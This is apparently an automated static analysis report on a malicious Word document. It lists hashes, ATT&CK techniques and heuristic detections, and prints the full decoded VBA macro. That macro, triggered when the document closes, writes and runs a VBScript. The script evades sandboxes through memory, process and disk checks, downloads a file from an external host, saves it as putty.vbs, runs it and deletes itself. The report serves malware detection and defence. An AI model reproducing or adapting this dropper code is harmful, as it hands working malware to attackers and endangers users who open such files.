Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d6fe849df843b8f5…

MALICIOUS

Office (OOXML)

Size: 84.1 KB
Created: 2021-06-07 18:05:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-06-17
MD5: e7d0a3488848ceaf735cd0c2cb19f7dd
SHA-1: ef94c81b4abea013efca7ebb6919cc279e0d2967
SHA-256: d6fe849df843b8f519943ee6cc16e4813f3a7b5e0881620c63e4aaf66a377f19
Risk score: 390

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The Document_Close subroutine writes a VBScript file named 'HelpCenter.vbs' to the user's Documents folder and runs it. That script checks for specific computer names and then performs further actions, indicating downloader or dropper functionality.

Heuristics (10)

  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
            Result = "wscript.exe " & Chr(34) & qs & Chr(34)
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Set nbhx28yw = CreateObject("Scripting.FileSystemObject")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
      hwiqfqqE = Environ("USERPROFILE") + "\Documents"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
    • https://crabbier-airports.000webhostapp.com/index66.html (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4810 bytes
SHA-256: 2de5fb4e7598c3cc5b69717959ab4305d4744d0adc7efc643dc07d34ee4f16b0
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Rem Attribute VBA_ModuleType=VBADocumentModule

Private Sub Document_Close()
    On Error Resume Next
    Dim wipsirdx
    Dim nbhx28yw
    Dim hwiqfqqE

  
  Set nbhx28yw = CreateObject("Scripting.FileSystemObject")
  hwiqfqqE = Environ("USERPROFILE") + "\Documents"
  If Not nbhx28yw.FileExists(Environ("USERPROFILE") + "\Documents\" + "tLLsm4W2.txt") Then
     If Not nbhx28yw.FolderExists(hwiqfqqE) Then nbhx28yw.CreateFolder (hwiqfqqE)

        qs = hwiqfqqE + "\HelpCenter.vbs"
        Dim hwiqfhssaqE As Object
        Set hwiqfhssaqE = nbhx28yw.CreateTextFile(qs, True, True)
hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_OperatingSystem"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "named = objItem.CSName" & vbCrLf
hwiqfhssaqE.Write "numbproc = objItem.NumberOfProcesses" & vbCrLf
hwiqfhssaqE.Write "memory = objItem.TotalVisibleMemorySize" & vbCrLf

hwiqfhssaqE.Write "sArray = Array(""DESKTOP-DN3JK31"", ""DESKTOP-D"", ""DESKTOP-D2231"")" & vbCrLf
hwiqfhssaqE.Write "sFind = named" & vbCrLf
hwiqfhssaqE.Write "s = Join(sArray, ""|"")" & vbCrLf
hwiqfhssaqE.Write "If InStr(1, s, sFind, vbTextCompare) Then" & vbCrLf
'hwiqfhssaqE.Write "MsgBox ""yep""" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf

hwiqfhssaqE.Write "If memory < 4000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">4gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf

hwiqfhssaqE.Write "If numbproc < 28 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">28""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf

hwiqfhssaqE.Write "strComputer = "".""" & vbCrLf
hwiqfhssaqE.Write "Set objWMIService = GetObject(""winmgmts:\\"" & strComputer & ""\root\cimv2"")" & vbCrLf
hwiqfhssaqE.Write "Set colItems = objWMIService.ExecQuery(""Select * from Win32_DiskDrive"", , 48)" & vbCrLf
hwiqfhssaqE.Write "For Each objItem In colItems" & vbCrLf
hwiqfhssaqE.Write "disksize = objItem.Size" & vbCrLf
hwiqfhssaqE.Write "If disksize < 60000000000 Then" & vbCrLf
hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
hwiqfhssaqE.Write "Else" & vbCrLf
'hwiqfhssaqE.Write "MsgBox "">60gb""" & vbCrLf
hwiqfhssaqE.Write "End If" & vbCrLf
hwiqfhssaqE.Write "Next" & vbCrLf
'hwiqfhssaqE.Write "End Sub" & vbCrLf

hwiqfhssaqE.Write "Dim xHttp: Set xHttp = CreateObject(""microsoft.xmlhttp"")" & vbCrLf
hwiqfhssaqE.Write "Dim bStrm: Set bStrm = CreateObject(""Adodb.Stream"")" & vbCrLf
hwiqfhssaqE.Write "xHttp.Open ""GET"", ""https://crabbier-airports.000webhostapp.com/index66.html"", False" & vbCrLf
hwiqfhssaqE.Write "xHttp.Send" & vbCrLf
hwiqfhssaqE.Write "With bStrm" & vbCrLf
hwiqfhssaqE.Write ".Type = 1" & vbCrLf

hwiqfhssaqE.Write ".Open" & vbCrLf
hwiqfhssaqE.Write ".write xHttp.responseBody" & vbCrLf
hwiqfhssaqE.Write ".savetofile ""putty.vbs"", 2 " & vbCrLf
hwiqfhssaqE.Write "End With" & vbCrLf
hwiqfhssaqE.Write "Set objShell = WScript.CreateObject(""WScript.Shell"")" & vbCrLf
hwiqfhssaqE.Write "objShell.Run (""putty.vbs"")" & vbCrLf

hwiqfhssaqE.Write "Set mFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
hwiqfhssaqE.Write "Call mFSO.DeleteFile(Wscript.ScriptFullName, True)" & vbCrLf
hwiqfhssaqE.Write "Wscript.Quit" & vbCrLf
        hwiqfhssaqE.Close
        
        Set wipsirdx = CreateObject("WScript.Shell")
        Result = "wscript.exe " & Chr(34) & qs & Chr(34)
        wipsirdx.Run Result, 1, True

        Set mFSO = CreateObject("Scripting.FileSystemObject")
        Call mFSO.DeleteFile(Wscript.ScriptFullName, True)
        Wscript.Quit
        
    End If

End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 14848 bytes
SHA-256: ca994a44001bd28a5f1efa9b3fe2633098980c67af079d79d7817cbf8e0be322